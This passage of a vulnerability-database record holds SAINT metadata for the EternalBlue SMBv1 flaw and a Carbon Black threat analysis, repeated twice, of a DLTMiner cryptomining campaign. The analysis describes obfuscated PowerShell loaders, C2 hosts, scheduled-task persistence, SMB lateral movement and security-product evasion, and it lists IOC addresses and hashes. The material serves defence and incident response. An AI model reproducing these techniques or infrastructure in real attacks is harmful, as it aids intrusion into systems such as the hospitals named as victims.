"type": "zdt"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["CVE-2017-0143"], "type": "cve"}, {"idList": ["SSV:92952"], "type": "seebug"}, {"idList": ["SMNTC-96703"], "type": "symantec"}, {"idList": ["F5:K57181937"], "type": "f5"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:142181", "PACKETSTORM:142548"], "type": "packetstorm"}]}, "score": {"value": 7.5, "vector": "NONE"}}, "hash": "d6fe647cb4ebd5763d03a0356ecaf674eb43f399c7c95e6f750eb94527b9c092", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "bd676e3751a4d110eaa275bf92ca7e46", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "46cfe8ba7ece1f650e5f50e76a93bd99", "key": "description"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "lastseen": "2018-08-31T00:08:18", "modified": "2017-04-26T00:00:00", "objectVersion": "1.3", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 41}, "differentElements": ["cvss"], "edition": 4, "lastseen": "2018-08-31T00:08:18"}, 
{"bulletin": {"bulletinFamily": "exploit", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "Added: 04/26/2017 \nCVE: [CVE-2017-0143](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143>) \nBID: [96703](<http://www.securityfocus.com/bid/96703>) \n\n\n### Background\n\nServer Message Block (SMB) is the protocol used by Microsoft Windows computers to communicate over a network. SMBv1 was the first version of this protocol and is still supported by modern Windows versions. \n\n### Problem\n\nA vulnerability in the handling of certain SMBv1 requests could allow a remote attacker to execute arbitrary commands. \n\n### Resolution\n\nApply the patch referenced in [MS17-010](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>), or [disable SMBv1](<https://support.microsoft.com/en-us/help/2696547/how-to-enable-and-disable-smbv1,-smbv2,-and-smbv3-in-windows-vista,-windows-server-2008,-windows-7,-windows-server-2008-r2,-windows-8,-and-windows-server-2012>). \n\n### References\n\n<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx> \n\n\n### Limitations\n\nExploit works on 64-bit versions of Windows 7 and Windows Server 2008 R2. 
\n\n### Platforms\n\nWindows 7 \nWindows Server 2008 R2 \n \n\n", "edition": 1, "hash": "b6fd1763e0cc46e1dd61da06e65309dec54b34ab00f44652a090d2052cf220c8", "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "2076413bdcb42307d016f5286cbae795", "key": "cvss"}, {"hash": "b3eb3e5939e1290e443adbd9dcd4d55f", "key": "title"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "56765472680401499c79732468ba4340", "key": "objectVersion"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "published"}, {"hash": "9347e214aa74471d67b0cec25114c5c9", "key": "modified"}, {"hash": "a2e6da74c8b179f121f93bda28c97a91", "key": "reporter"}, {"hash": "bd676e3751a4d110eaa275bf92ca7e46", "key": "href"}, {"hash": "67164609e54a9c48368f8c8211098c3c", "key": "cvelist"}, {"hash": "2a4c1f6b0cd88cf3fac4b56bd4283522", "key": "type"}, {"hash": "b585fb8d48395d7459f226680992c33c", "key": "description"}], "history": [], "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/windows_smbv1_eternalblue", "id": "SAINT:BD676E3751A4D110EAA275BF92CA7E46", "lastseen": "2017-05-01T21:21:19", "modified": "2017-04-26T00:00:00", "objectVersion": "1.2", "published": "2017-04-26T00:00:00", "references": [], "reporter": "SAINT Corporation", "title": "Windows SMBv1 Remote Command Execution", "type": "saint", "viewCount": 3}, "differentElements": ["description"], "edition": 1, "lastseen": "2017-05-01T21:21:19"}], "edition": 6, "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "67164609e54a9c48368f8c8211098c3c"}, {"key": "cvss", "hash": "d726e774add6189e33cf2ea0c61a2ba5"}, {"key": "cvss2", "hash": "e8dbb4c019811b96da3443b871bd4b26"}, {"key": "cvss3", "hash": "732a831a7eed3955e8de18b2d8903bc8"}, {"key": "description", "hash": "46cfe8ba7ece1f650e5f50e76a93bd99"}, {"key": "href", "hash": "bd676e3751a4d110eaa275bf92ca7e46"}, {"key": "immutableFields", "hash": 
"d41d8cd98f00b204e9800998ecf8427e"}, {"key": "modified", "hash": "9347e214aa74471d67b0cec25114c5c9"}, {"key": "published", "hash": "9347e214aa74471d67b0cec25114c5c9"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "a2e6da74c8b179f121f93bda28c97a91"}, {"key": "title", "hash": "b3eb3e5939e1290e443adbd9dcd4d55f"}, {"key": "type", "hash": "2a4c1f6b0cd88cf3fac4b56bd4283522"}], "hash": "039f4527c7142d8fb25e10bb6ab587ec892e0bcd8fa231fd4da30f194f5193d6", "viewCount": 349, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0143"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:43970", "EDB-ID:47456", "EDB-ID:41891", "EDB-ID:41987"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27752", "1337DAY-ID-33895"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:156196", "PACKETSTORM:154690", 
"PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "MS17-010.NASL", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4", "QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}], "modified": "2021-07-29T16:40:11", "rev": 2}, "score": {"value": 8.6, "vector": "NONE", "modified": "2021-07-29T16:40:11", "rev": 2}}, "objectVersion": "1.6", "scheme": null, "immutableFields": [], "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, 
"confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}}], "carbonblack": [{"id": "CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D", "hash": "34fb77003032a9ec1af4e7cbf893b51cfd672888dd781c3262e0c5a460a8b3f3", "type": "carbonblack", "bulletinFamily": "blog", "title": "CB TAU Technical Analysis: DLTMiner Campaign Targeting Corporations in Asia", "description": "A CB customer recently provided a series of commands that they had observed for analysis. The customer felt that the associated attacker activity may have been attempting to tamper with the Carbon Black product. It turned out they were not, but the attackers were specifically looking for the presence of Carbon Black and, if present, would not perform any additional malicious actions and their script would exit. \n\n**Note:** [If you are a Carbon Black customer looking for information on how CB solutions defend against this campaign, click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-DLTMiner-Campaign/ta-p/76690>)\n\nAfter analysis, TAU determined that this activity appears to be related to a DLTMiner campaign which was primarily targeting Asian corporations. This campaign appears to be an evolution of a campaign that was initially reported in January of 2019. 
The campaign in the past has incorporated both crypto-mining and crypto-jacking aspects. The customer did not provide any context as to how they suspected that the attackers initially gained entry into the network; however, previously disclosed DLTMiner campaigns exploited the Eternal Blue vulnerability (MS17-010 and CVE-2017-0143 - 0148) as well as RDP brute forcing. The portion of this attack that specifically pertained to Carbon Black products was not an attack on the product itself or a vulnerability in the product. However, the attacker was specifically looking for the presence of Carbon Black products and, if located, the script would then exit before performing any additional malicious actions. The initial commands issued by the attacker would decode several layers of obfuscated PowerShell code, which ultimately downloaded additional PowerShell scripts from two different embedded C2 sites. One of the C2 sites is non-responsive, and is believed to be parked. ![Figure_1.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2285iE9A2453481BF4A4D/image-size/large?v=1.0&px=999)__\n\n_Figure 1: Attack Overview_\n\n# Technical Analysis\n\n## PowerShell Command - Carbon Black Enumeration\n\nThe original command that was provided is displayed below and was slightly altered to make viewing the contents easier to read. The area highlighted in the red box is the portion of the command that the customer felt was targeting Carbon Black products.\n\n![Figure_2.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2286i576C1541CF7D7039/image-size/large?v=1.0&px=999)__\n\n_Figure 2: PowerShell Command_\n\nThe command appears to have backslashes (**\\**) removed from the file paths, before being submitted. However, this PowerShell command would look to see if the directory **C:\\Windows\\CarbonBlack** existed; this is the default installation path for Carbon Black Response. 
If the directory exists it would modify the **AppMgmt** service\u2019s binary path to **C:\\Windows\\System32\\svchost.exe**. **_The script will then exit before performing any further actions that would be detected by CarbonBlack Products_**. These actions **do not** interact, modify, or tamper with the Carbon Black Response sensor or associated process or service.\n\n## PowerShell Command - Payload Execution\n\nThe payload for this attack was zlib compressed and base64 encoded before being embedded into the PowerShell command. The image below highlights the truncated payload, which is executed using the Invoke-Expression (iex) cmdlet.\n\n \n\n![Figure_3.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2287i38C3E4F69E16AB6F/image-size/large?v=1.0&px=999)___Figure 3: PowerShell payload_\n\nTAU was able to base64 decode and partially decompress the payload. The payload was another PowerShell command that was obfuscated using standard techniques that have been observed in numerous different types of campaigns. The metadata for the payload as it was decoded is listed below; however, this was for the truncated data.\n\nFile Name : payload\n\nFile Size : 3,266 bytes\n\nMD5 : b6fdbadea4dda2c54e51a16e18ca4e00\n\nSHA256 : d85096783eac330e575278ecef2a4ab1bde9ca9b5426edafaf5c425f3defd789 \n \n--- \n \n_Table 2: Payload Metadata_\n\n## Secondary Payload\n\nThe body of the PowerShell command is depicted in the image below. The obfuscation will build the final PowerShell command from an array of strings, and a custom order which is listed in brackets at the beginning.\n\n![Figure_4.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2288iDF887F223C0D3B60/image-size/large?v=1.0&px=999)__\n\n_Figure 4: Secondary PowerShell Payload_\n\nBuilding the array from this truncated data will not result in a properly formatted PowerShell script. 
However another sample was located, which was the same and could be properly formatted, which resulted in the following script, depicted below. This script serves as a loader or cradle which will download additional malicious code or script, that will then be entrenched on the system as a scheduled service, dependent upon other variables.\n\n![Figure_5.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2289iD05FACD0A11E13EA/image-size/large?v=1.0&px=999)__\n\n_Figure 5: Secondary PowerShell Payload_\n\n### Secondary Payload Analysis\n\nThe script above will perform several different checks and create different variables, which are used for C2 communications. In the image below the script will gather and format the MAC address for the system and set that as a variable, highlighted in red. The script will then set the $flag variable (whose name is reused later) to a non-existent variable, which is then set to True in line 5, if script is able to create the mutex \u2018Global\\PSEXEC\u2019. All of that activity is highlighted in blue.\n\n![Figure_6.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2290i4F6A02253772F662/image-size/large?v=1.0&px=999)__\n\n_Figure 6: Variables Set and System information_\n\nFrom the area highlighted in green above, the script will create a string that is composed of different hard coded variables and basic system information. The variables and their descriptions are listed in the table below.\n\nSystem Parameters \n \n--- \n \n_Variable Name_\n\n| \n\n_Notes_ \n \nmac\n\n| \n\nMAC address of the current system \n \nav\n\n| \n\nThis variable is not set in this version of the script. In previous iterations of this script, there may have been code that enumerated if AV was running on the system. \n \nversion\n\n| \n\nThis retrieves the MS Windows Version number (ex. 10.1.XXXX or 6.2.XXXX) \n \nbit\n\n| \n\nThis retrieves the OS architecture (ex. 
32-bit or 64-bit) \n \nflag2\n\n| \n\nThis is the flag variable that was set in the previous section. This will be listed as True if the Mutex was created and False if that operation failed. This and the PS argument should always match. \n \ndomain\n\n| \n\nThis retrieves the domain that the system is joined to. \n \nuser\n\n| \n\nThis retrieves the current user account name \n \nPS\n\n| \n\nThis is the flag variable that was set in the previous section. This will be listed as True if the Mutex was created and False if that operation failed. This and the flag2 argument should always match. \n \n_Table 3: System Information_\n\nThe script will then set another set of variables and conduct some additional checks. The current date will be stored as the $dt variable, and used in C2 communications, highlighted in green. The $flag and $flag2 variables are set depending on whether or not certain files exist on the current system, highlighted in blue. The final check is for the variable $permit, which determines if the current process is running with Administrator privileges. \n\n![Figure_7.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2291iA5627586B5CC013B/image-size/large?v=1.0&px=999)__\n\n_Figure 7: Second Variables Set and System information_\n\nThe variables and checks that were conducted in the previous steps are then used to determine which embedded C2 to communicate with, as well as what resource to request from the C2. The script will check, via the $flag variable, to see if the file ccc.log exists in the user\u2019s temp folder. If not, then it would create that file, which is highlighted in red in the image below. \n\nThe next check would determine if the current process was running with Administrator privileges, via the $permit variable. Regardless of whether or not the process was running with Administrator privileges, the script would contact the C2 **hXXP://cdn.chatcdn[.]net**. 
If running with Administrator privileges the request would contain \u201c**p?hig**\u201d and the date from the $dt variable. If not, the request would contain \u201c**p?low**\u201d and the date. The response was expected to be a string that was base64 encoded. A scheduled task, named **Winnet**, is then created to run every 45 minutes, which will execute PowerShell and the base64 encoded payload from the C2 site. The only difference in the two instances is whether the scheduled task runs under the context of the \u201csystem\u201d or not. All of this activity is highlighted in blue below. \n\n_![Figure_8.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2292i6FD67FDCC1F5DCEF/image-size/large?v=1.0&px=999)___\n\n_Figure 8: C2 Communications_\n\nAt the time of this analysis the C2 site **hXXP://cdn.chatcdn[.]net** was not actively responding to requests. It should be noted that originally this domain was resolving to the IP Address 134[.]209.103.152, which was the secondary C2 in this specific script, beginning on April 29, 2019. On approximately May 14, 2019, this domain was parked at 0[.]0.0.0, which is a common technique. However, on approximately May 15, 2019 the domain began resolving to 74[.]119.239.234, which appears to be either a public-domain parking IP Address or, less likely, a sinkhole. TAU was unable to find a sample of the response from the server when it was originally responding to requests. However, directly making requests to the original IP address where the C2 resolved will return a payload which is described in a later section. 
\n\nResolved IP\n\n| \n\nFirst Observed \n \n---|--- \n \n74[.]119.239.234\n\n| \n\n5/15/19 20:41 \n \n0[.]0.0.0\n\n| \n\n5/14/19 1:58 \n \n134[.]209.103.152\n\n| \n\n4/29/19 5:33 \n \n_Table 4: Domain Name Resolution_\n\nIf the ccc.log file exists on the system, which from the flow of the script will always occur as the previous conditional statement creates the file if it did not exist, then the script will reach out to a secondary C2. This activity is highlighted in green in the image above. The script will reach out to 134[.]209.103.152 and request \u201c**update?**\u201d with the system information string that was created in the first portion of the analysis. The response as of this testing was an additional PowerShell script that would be executed, via cmd.exe, which will launch PowerShell and the third stage payload. It should be noted that TAU was able to locate a payload that was being provided from that same C2 on May 16, 2019. In both those instances the metadata for the file was the same, which is listed in the table below. \n\nFile Name : Third_Stage\n\nFile Size : 3,110,651 bytes\n\nMD5 : 500a3b178af4d066a88a27edf1a278c0\n\nSHA256 : 1756723b89788ba0f53ce9752e40ae50c7545c8993d4ca08768463289a73a53b \n \n--- \n \n_Table 5: Third Stage Payload_\n\n## Third Stage Payload\n\nA small subset of the third stage payload that is downloaded from 134[.]209.103.152 is depicted in the image below. The script uses reverse order, character replacement, and other standard obfuscation techniques to deter analysis.\n\n![Figure_9.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2293i35403672A35FC8AA/image-size/large?v=1.0&px=999)__\n\n_Figure 9: Third Stage Payload_\n\nTAU was able to decode the script (to a reasonable degree), which appears to be a variant of an open source script used to exploit SMB vulnerabilities for lateral movement, commonly referred to as Invoke-SMBExec. 
The script contains an embedded PE file, base64 encoded, that appears to be a version of Mimikatz. Due to some of the errors in the decoding process, that could not be confirmed.\n\n## Campaign\n\n### Initial Campaign\n\nThe initial campaign that is related to this incident was disclosed in January of 2019 by 360.cn. In that campaign there was overlap in the manner in which PowerShell scripts were formatted and variables set. Additionally, the manner in which the request and data were being sent to the C2 server aligns with what was observed in the current campaign. This initial campaign appears to have been active from January 2019 through February of 2019, and targeted organizations in China.\n\nAdditionally, there was a campaign that was documented in April that was also attributed to the original campaign. In this campaign organizations in Japan, Australia, Taiwan, Vietnam, Hong Kong, and India were being targeted for Monero cryptocurrency mining. In this campaign different artifacts from the PowerShell scripts being used, the exploitation of SMB vulnerabilities, reflective injection of payloads, and the C2 communication structure align with what was observed in the ongoing campaign. This portion of the larger campaign occurred in the March and April 2019 time frames.\n\n**Ongoing Campaign**\n\nTAU was able to track an ongoing campaign that was related to the truncated command that was submitted in this escalation. In this latest portion of the campaign organizations in Asia were being targeted. TAU identified two potential victims, which were both hospitals, one located in Vietnam and one in the United States. The script that was submitted overlaps in C2 infrastructure with at least 3 other scripts that were located in public repositories. In the image below, the submitted script is located at the top left of the image. C2 communications are depicted in dotted red lines, while URL resolutions are in orange lines. 
Files that are being served up by different C2s are list in dotted blue lines.![Figure_10.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2294iFB71C6C2B19E5E75/image-size/large?v=1.0&px=999)__\n\n_Figure 10: Campaign Overview_\n\n**Remediation:**\n\n## **MITRE ATT&amp;CK TIDs **\n\n**TID**\n\n| \n\n**Tactic**\n\n| \n\n**Description** \n \n---|---|--- \n \nT1110\n\n| \n\nCredential Access\n\n| \n\n**Brute Force: **It was previously reported that DLTMiner campaigns was utilizing RDP brute forcing for initial access. \n \nT1190\n\n| \n\nInitial Access\n\n| \n\n**Exploit Public-Facing Application:** Eternal Blue vulnerability was also reported to be used in connection with this campaign \n \nT1086\n\n| \n\nExecution\n\n| \n\n**PowerShell:** PowerShell is heavily leveraged \n \nT1053\n\n| \n\nPersistence\n\n| \n\n**Scheduled Tasks:** Persistence is maintained via scheduled tasks \n \nT1210\n\n| \n\nLateral Movement\n\n| \n\nSMB: One of the additional payloads will enumerate lateral systems and attempt to exploit the eternal blue vulnerabilites \n \n \n\n## IOCs\n\nRelated Sample Hashes \n \n--- \n \n0c3f63af1e35d1b384a01d8caa8c49d6c7946affe1386a697079c352b76eaeef\n\n| \n\nRelated PowerShell Script \n \n21d783d08299b73f24a7cc20c3e5b43b13c06aea1bf9caca66aef09799719598\n\n| \n\nRelated PowerShell Script \n \n1b987ba4983d98a4c2776c8afb5aebbe418cdea1a7d4960c548fb947d404e4b2\n\n| \n\nRelated PowerShell Script \n \n1756723b89788ba0f53ce9752e40ae50c7545c8993d4ca08768463289a73a53b\n\n| \n\nLateral Movement Script \n \n134.209.103.152\n\n| \n\nC2 \n \ncdn.chatcdn.net\n\n| \n\nC2 \n \n206.189.87.176\n\n| \n\nPotential Parking IP Address \n \nexplorer.sombewallet.tk\n\n| \n\nC2 \n \n134.209.103.236\n\n| \n\nC2 \n \np.estonine.com\n\n| \n\nC2 \n \n128.199.99.33\n\n| \n\nC2 \n \nThe post [CB TAU Technical Analysis: DLTMiner Campaign Targeting Corporations in 
Asia](<https://www.carbonblack.com/2019/07/23/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/>) appeared first on [Carbon Black](<https://www.carbonblack.com>).", "published": "2019-07-23T13:47:50", "modified": "2019-07-23T13:47:50", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "href": "https://www.carbonblack.com/2019/07/23/cb-tau-technical-analysis-dltminer-campaign-targeting-corporations-in-asia/", "reporter": "Ryan Murphy", "references": [], "cvelist": ["CVE-2017-0143"], "lastseen": "2019-07-23T14:42:33", "history": [{"bulletin": {"bulletinFamily": "blog", "cvelist": ["CVE-2017-0143"], "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {}, "cvss3": {}, "description": "A CB customer recently provided a series of commands that they had observed for analysis. The customer felt that the associated attacker activity may have been attempting to tamper with the Carbon Black product. It turned out they were not, but the attackers were specifically looking for the presence of Carbon Black and, if present, would not perform any additional malicious actions and their script would exit. \n\n**Note:** [If you are a Carbon Black customer looking for information on how CB solutions defend against this campaign, click here.](<https://community.carbonblack.com/t5/Threat-Research-Docs/TAU-TIN-DLTMiner-Campaign/ta-p/76690>)\n\nAfter analysis, TAU determined that this activity appears to be related to a DLTMiner campaign which was primarily targeting Asian corporations. This campaign appears to be an evolution of a campaign that was initially reported in January of 2019. The campaign in the past has incorporated both crypto-mining and crypto-jacking aspects. 
The customer did not provide any context to how they suspected that the attackers initially gained entry into the network, however previously disclosed DLTMiner campaigns exploited the Eternal Blue vulnerability (MS17-010 and CVE-2017-0143 - 0148) as well as RDP brute forcing. The portion of this attack that specifically pertained to Carbon Black products, was not an attack on the product itself or a vulnerability in the product. However, the attacker was specifically looking for the presence of Carbon Black products and if located the script would then exit, before performing any additional malicious actions. The initial commands issued by the attacker would decode several layers or obfuscated PowerShell code, which ultimately downloaded additional PowerShell scripts from two different embedded C2 sites. One of the C2 sites is non responsive, and is believed to be parked. ![Figure_1.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2285iE9A2453481BF4A4D/image-size/large?v=1.0&px=999)__\n\n_Figure 1: Attack Overview_\n\n# Technical Analysis\n\n## PowerShell Command - Carbon Black Enumeration\n\nThe original command that was provided is displayed below and was slightly altered to make viewing the contents easier to read. The area highlighted in the red box, is the portion of the command that the customer felt was targeting Carbon Black products.\n\n![Figure_2.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2286i576C1541CF7D7039/image-size/large?v=1.0&px=999)__\n\n_Figure 2: PowerShell Command_\n\nThe command appears to have backslashes (**\\**) removed from the file paths, before being submitted. However this PowerShell command would look to see if the directory **C:\\Windows\\CarbonBlack** existed, this is the default installation path for Carbon Black Response. If the directory exists it would modify the **AppMgmt** service\u2019s binary path to **C:\\Windows\\System32\\svchost.exe**. 
**_The script will then exit before performing any further actions that would be detected by CarbonBlack Products_**. These actions **do not** interact, modify, or tamper with the Carbon Black Response sensor or associated process or service.\n\n## PowerShell Command - Payload Execution\n\nThe payload for this attack was zlib compressed and base64 encoded before being embedded into the PowerShell command. The image below highlights the truncated payload, which is executed using the Invoke-Expression (iex) cmdlet.\n\n \n\n![Figure_3.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2287i38C3E4F69E16AB6F/image-size/large?v=1.0&px=999)___Figure 3: PowerShell payload_\n\nTAU was able to base64 decode and partially decompress the payload, The payload was another PowerShell command, that was obfuscated using standard techniques that have been observed in numerous different types of campaigns. The metadata for the payload as it was decoded is listed below, however this was for the truncated data\n\nFile Name : payload\n\nFile Size : 3,266 bytes\n\nMD5 : b6fdbadea4dda2c54e51a16e18ca4e00\n\nSHA256 : d85096783eac330e575278ecef2a4ab1bde9ca9b5426edafaf5c425f3defd789 \n \n--- \n \n_Table 2: Payload Metadata_\n\n## Secondary Payload\n\nThe body of the PowerShell command is depicted in the image below. The obfuscation will build the final PowerShell command from an array of strings, and a custom order which is listed in brackets at the beginning.\n\n![Figure_4.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2288iDF887F223C0D3B60/image-size/large?v=1.0&px=999)__\n\n_Figure 4: Secondary PowerShell Payload_\n\nBuilding the array from this truncated data, will not result in a properly formatted PowerShell script. However another sample was located, which was the same and could be properly formatted, which resulted in the following script, depicted below. 
This script serves as a loader (download cradle) that retrieves additional malicious code or scripts, which are then entrenched on the system as a scheduled task, depending on other variables.
This and the PS argument should always match. \n \ndomain\n\n| \n\nThis retrieves the domain that the system is joined to. \n \nuser\n\n| \n\nThis retrieves the current user account name \n \nPS\n\n| \n\nThis is the flag variable that was set in the previous section. This will be listed as True if the Mutex was created and False if that operation failed. This and the flag2 argument should always match. \n \n_Table 3: System Information_\n\nThe script will then set another set of variables and conduct some additional checks. The current date will be stored as the $dt variable, and used in C2 communications, highlighted in green. The $flag and $flag2 variables are set depending on whether or not certain files exist on the current system, highlighted in blue. The final check is for the variable $permit, which determines if the current process is running with Administrator privileges. \n\n![Figure_7.png](https://community.carbonblack.com/t5/image/serverpage/image-id/2291iA5627586B5CC013B/image-size/large?v=1.0&px=999)__\n\n_Figure 7: Second Variables Set and System information_\n\nThe variables and checks that were conducted in the previous steps are then used to determine which embedded C2 to communicate with, as well as what resource to request from the C2. The script will check, via the $flag variable, to see if the file ccc.log exist in the user\u2019s temp folder. If not, then it would create that file, which is highlighted in red in the image below. \n\nThe next check would determine if the current process was running with Administrator privileges, via the $permit variable. Regardless of whether or not the process was running with Administrator privileges, the script would contact the C2 **hXXP://cdn.chatcdn[.]net**. If running with Administrator privileges the request would contain \u201c**p?hig**\u201d and the date from the $dt variable. If not the request would contain \u201c**p?low**\u201d and the date. 
